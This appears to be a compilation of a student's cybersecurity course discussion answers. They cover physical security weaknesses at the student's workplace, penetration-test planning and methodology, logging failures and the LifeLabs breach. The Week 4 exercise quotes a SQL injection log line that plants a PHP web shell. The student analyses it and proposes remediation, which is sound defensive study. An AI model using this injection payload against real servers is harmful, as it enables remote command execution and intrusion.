between 6 pm to 8 am is a vulnerability where there are chances for anyone to
tailgate another employee who has an access card or anyone from inside can
open the door for that person to enter as there is a security camera only at the
entrance to the door and none in the reception area. 2. When the security is not
at the desk when the doors are open, it is easy for the visitor to enter any door
with an employee's help.
 Cameras – there is a camera at the entrance and everywhere on every floor
except for the reception area which is the most primary and important location.
 Server room access – The server room does not have a lock and is right by the
boarding room where there are no cameras so anyone can easily access the Key
to the Castle.

For example – if an employee from a different branch is fired and decided to harm the
organization with a malicious activity it will be very easy and simple – follow a current
employee who knows the attacker but doesn’t know they got fired and get the
employee’s help to enter the building and access the door to the floor where the server
room is located as there is no security control in place accessing the elevator and the
server room is always open
Yard/ Repair shop/ Gas Station

 One key to 3 castles – Can’t pass thru the boom barrier controlled by 4 security
guards. Every vehicle entering and exiting must stop for the boom barrier to be
lifted. Security guards at my organization know most of the cars and employees
so they let them thru and watch which way they walk as some employees park in
 the yard parking and walk to the office building and when the guard is unsure
then the vehicle is stopped and asked to provide with company-issued ID or a
government ID which is printed to verify and validate. The security cameras
capture the plates and make and model of the vehicle. And the same procedure
is followed for the trucks.
 Cameras – there are cameras located at every corner of the yard as all kinds of
shipments are parked in the yard. There are cameras located at the repair shop
and the gas station as well.
 Logging – every truck leaving the yard is logged but what I notice they failed at is
when the truck was expected to return. A few months ago – 3 trucks entered our
company yard that looked exactly the same as our company trucks with logo/
truck number/ plate number, etc., and left with 3 trailers full of Michelin tires,
Keurig Coffee, and refurbed electronics. It wouldn’t have been easy to catch all
the trucks on time if one of the dispatchers didn’t notice the truck leaving the
yard when that particular truck should have reached the border by that time.

I would like to finish this discussion with the fact that no matter how much physical and
Personnel controls are in place at an organization. It is always important to perform a
physical penetration testing assessment to evaluate the security controls.
Question:

Week 6 Discussion
I invite you to answer the following mandatory question, and one of Option A or Option
B and actively prompt your peers:
1.) (Mandatory!) Where do you think you will begin your Cyber career and why? This
is not an essay – this is you telling your peers what you’re good at, what interests you,
and why. Imagine it this way – if they come across a job, you want them to think of you
and your interests, as well as your strengths.
2.) (Option A) What topic do you feel deserves a deeper dive and discussion? Pose the
topic to your peers and challenge them to bring up simple and succinct guidance that
will either help clarify the topic, or level-up your understanding beyond what’s covered
by (ISC)2.
3.) (Option B) Related to #1, above – We’re often not the best at seeing our own
strengths – we’re generally hard on ourselves and don’t appreciate how others “see” us.
Pick a peer (maybe an unlikely one) who’s skills you admire, and tell them what you
think they’d be great at within the Cyber Security world, and why. This may (hopefully)
broaden their own aspirations and open new doors. At a minimum, they’ll have an
appreciation for how they are perceived and can capitalize on it.
Answer:
1. Last year, around the same time I decided to change career because there was not
much career growth in the line of business I am currently working in except for sales. I
felt that a career in Cyber Security is most attractive and interesting for a career
change. I am a strong believer in “never too late to learn”, hence here I am. I have
always wanted to have a ‘proud of me’ moment and today with the help of peer/
instructors and everything I have learned from their source of knowledge and teaching I
am halfway thru that moment and as I land in a job as a Security/Network/ Systems
Administrator or a junior cyber analyst in 2021 I will finally have that moment and then I
will be pursuing a career growth followed by an incident responder role and then
continue learning as I grow.

3. Option B – This is a very tough situation for a learner with no IT background.

Almost all my peers have an IT background and obviously, very knowledgeable.
For me, it was a good learning experience as I spent hours reading everyone's
discussions and watching everyone conversing during the online classes. I still
have a lot to learn from everyone one here. This course is one of my treasure
maps and all my peers and instructors hold the treasure of knowledge.
Question: Week 1 - Security Assessment and Testing
Fundamentals
Congratulations on joining ACME Widgets Inc as the senior security specialist. On your
first week, the CISO invites you to an urgent meeting. He has just read about a MAJOR
Vulnerability discovered in Apache web servers. The vulnerability is of an RCE type and
may allow threat actors to compromise the servers and gain ROOT access. Since ACME
uses Apache web-servers he is concerned.
The CISO also mentioned that it has been a while since they last performed a
penetration test on the environment and, as such, he is very worried and would like you
to bring in a 3rd party to conduct a PT as soon as possible.
ACME would need to go to RFP to find the best vendor for this project.
What are some of the parameters you would need to consider in order to write the RFP
and choose the best vendor for the job? Some of the questions you might want to
consider are:

1. Type of assessment needed (PT/VA/Health checks)?

2. Black/White/Grey Box methodology?
3. What systems will you include in the test, or exclude?
4. Qualifications of the 3rd party?
5. Should you indicate budget limits?
6. How will you evaluate possible vendors?

Any other topics of interest are welcome to the discussion.

Answer:
Penetration testing (PT) is one of the very important processes in any organization while
using third party Web-Servers. Since it has been a while a Pen-test was performed on
the environment, I would start by doing the below and as follows:

A full Penetration testing is recommended as it involves most comprehensive checks to

identify any known or unknown vulnerabilities on the systems. Black box testing is
recommended for the servers that are exposed to the internet as this will simulate the
access available to the attackers on the internet and grey box test is recommended for
the servers that are not exposed to the internet as this will simulate the testing with an
assumption that the attack was able to gain access to the internal network.
The primary focus of the scanning will include the servers affected by the recently
disclosed vulnerability (phase 1) and depending on the budget availability the scope of
the testing can be expanded to other externally exposed systems (phase 2) and then to
other internal systems (phase 3)

I will be looking for a reputed third party firm whose analyst possess widely recognized
industry certifications such as OSCP or CEH to perform penetration testing. Since there
are multiple such vendors available in the market, I would recommend sending out RFP
to multiple tops rated vendors and evaluate them based on multiple criteria such as
previous engagements with them quoted a cost per phase of testing and quickest
availability to perform the testing. I would not indicate the budget limit while sending
out the RFP as this may influence the quoted cost from the vendors.

Question: Week 2 - Infrastructure Security Control

Testing
Infrastructure Security Assessment
Consider an external penetration test of a mid-sized organization with the following
characteristics:

 1000 Endpoints
 Windows Network (all in active directory)
 Domain Controller
 10 External-Facing IP Addresses (including)
o Web Server (website itself is out of scope)
o Mail Server
o VPN

For each of the steps below, discuss in a paragraph the actions you would perform,
what tools you would use, and what the desired outputs would be.

1. Pre-Engagement
2. Reconnaissance
3. Scanning
4. Vulnerability Analysis
5. Exploitation
6. Reporting

Answer: Pre-Engagement- This phase involves agreeing with the client on the terms of
the engagement such as the method of assessment (i.e. grey box, white box, or
BlackBox) and the assets or network segments to include or exclude from the
assessment.
Reconnaissance - This is the starting phase of the penetration testing assessment. In
this phase, we can collect publicly available information to know more about the target.
Search engines like google can be used to search for specifics about the target. While
sources like shodan.io can be used to search for more technical information like publicly
exposed IP addresses, ports, etc about the target. The reconnaissance phase mostly
involves passive information collection without alerting the target.

Scanning - Based on previously collected information, we probe the IP addresses and

ports using tools such as Nmap and Nessus to identify ports and services running on the
targets. The scanning attempts can also detect version information of the open services
by interacting with them. This is considered an active information collection and may
trigger any detection solutions that are monitoring the target systems.

Vulnerability Analysis - Based on the information gathered from the scanning phase
such as the services running and their version information. We can research on any
vulnerabilities by consulting various sources such as CVE publications, discussion
forums to identify potential vulnerabilities that can be exploited.

Exploitation - This phase involves exploiting the previously identified vulnerable services
using some well-known tools such as Metasploit or cobalt strike. Sometimes, a 0-day
exploit (non publicly disclosed or available exploit) can also be used to exploit the
vulnerable service. The analyst can execute further commands to establish a foothold
on the target post-exploitation, escalate privileges, and move around laterally within the
client environment post-compromise.

Reporting - Following the successful completion of the assessment, the analyst may
prepare a pen testing report to that details all the findings that were identified during
the assessment such as the open services identified, vulnerabilities identified, exploits
that were used against the target, and any mitigating controls such as patches that can
be used to prevent such compromises by real-world attackers.
Question: Week 3 - Software Security Control Testing
This week we will focus our discussion on software security assessments. In this
discussion, you will prepare and discuss the target selection, scope and high-level
methodology to conduct a software assessment against an online store application (see
details below). Describe in as much detail the types of flaws you would look for, what
types of testing techniques you would use, and how you would report it.
Discussion details:

 Select one category from the OWASP Top-10 2017 and research and discuss the
category. In your discussion, provide an example of the sample code or
configuration files that illustrate the flaw. Discuss what tools you may use to
detect the flaw/s and provide your recommendations to mitigate them.

Answer:
A10:2017-Insufficient Logging & Monitoring

Logging the events happening in the network and endpoint is essential for an effective
detection and response to security incidents.
Some example of the common logging related mistakes that organization makes
include:

1. Not logging any events

2. Missing critical information in logs (e.g. Source IPs in webserver logs)
3. Incorrect time correlation between log sources (e.g. various logs logging using
different time sources)
4. No centralized log management (e.g. not using SIEM)
5. Short log retention duration
6. Not using automated solutions to monitor logs for security events.

An Attacker will avoid detection and hide within the environment if no proper logging
and monitoring are done by the organization. Even if the attacker is identified, it will be
hard to determine the activities of the attacker with our relevant logs being available to
perform forensics.

Given below is an example of group policies in windows where the object-level audit is
not configured. Without object access logs, it is hard for an investigator to determine
the objects accessed by the attacker.

https://stealthbits.com/blog/windows-file-activity-monitoring/
To maximize the effectiveness of the security program, the organization must collect
and retain logs from all the available sources such as endpoint, servers, and network
devices into a centralized logging server or a SIEM device. Automated use case
scenarios can be set up in SIEM to identify events such as brute-force attacks, high
resource utilization, abnormal logons, suspicious file access, etc. as these can serve as
a potential indicator of attacker activity in the network. Increasing the retention time in
the centralized server will also help in identify attacker activity that is undetected for a
long time in the network. If devices are generating logs across multiple timezones, then
they must be correlated in the logging server to a neutral server such as UTC to ensure
cross-device event correlation is possible. Some common examples of tools to use are
Splunk or ELK stack.
Question:

Week 4 - Reporting, Security Process Data

Collection and Verification
Consider the following LOG SNIPPET, and discuss what you believe happened:
/blog.php?id=1' UNION select 2, "<?php system($_REQUEST['cmd']); ?>" INTO OUTFILE
'/var/www/html/webshell.php
What would you recommend the client to do if this appears in the logs?
Answer:
In my opinion, the attackers have used SQL Injection vulnerability to gain server access.

The URL validation is used to output a simple web shell to the

/var/www/html/webshell.php file. The web shell will be later accessed by the attacker
and be used to execute commands on the webserver.

The client must do the below as the attack has already happened:
· Assess and identify how the attacker was able to inject the malicious code. If it was
through compromising an admin account or it was multi-user easy access
· Only admins should have the access to enable any changes to the codes on the
server with proper logging and monitoring and also, routine password change
· Investigate the Webserver logs further to identify any attacker interaction with the
webserver through the web shell
· Any changes/events happening around the same time on the webserver through
other log sources
· Remove the web shell uploaded by the attacker and also fix the initial vulnerability
that was used to place the web shell on the server by performing URL validation
· Frequent vulnerability assessments and logging and monitoring
· Even though URL validation is very much required, I would also recommend a blind
attack to see what other data can be extracted from an attacker side

Question: Select any famous breach from the past three years. Put on your “assessor
hat” and consider whether any of the events may have seen a different outcome if a
particular assessment would have taken place? Given what you learned in this course,
how would you have made sure that the appropriate stakeholders “heard and heeded”
your advice/recommendations/findings?

Answer:
LifeLabs is a company providing lab testing and other services to Canadians for over 50
years. Canada’s largest lab testing company informed that they were hacked in
December 2019 compromising almost 15million Canadian’s PII after the 1 st compromise
that happened in 2013.
It’s a known fact that with everyday increasing hacks, the health industry is the most
susceptible one to get compromised as the attackers know that no matter the
organization ‘Human life is always important’ and getting a ransom becomes easier.
LifeLabs made payment knowing the information was not made public which I believe is
the best they did to retrieve all the information that was in possession and of course, it
is not certain that the criminals did not make copies. According to some sources, PII
such as – Customer names, addresses, emails, Birthdates, health cards, login
credentials to access results along with the test results. And, most of the information
from were the 2013 attack where there was a situation of a lost Computer hard drive
that contained information including PII, health card number, and credit card details.
From internet resources, it is seen that LifeLabs did not maintain the required
Information security policies to protect the amount of data that was collected, lacked
security policies, and collected more than actually needed information.
Recommendations:
· Regulatory Organizations should consider all health industry carrying this amount
of sensitive information to have additional oversight and outside assistance.
· As it is constantly reminded ‘Human lives are most important’, every step should
be taken to protect them. The Lab should try limiting the information collected from
patients.
· A proper logging and monitoring policy should be in place with privilege access. If
a hard drive is missing it will be easily mapped with proper logging and monitoring.
· Employees should be strictly trained and made understand the policies and
practices while handling sensitive information.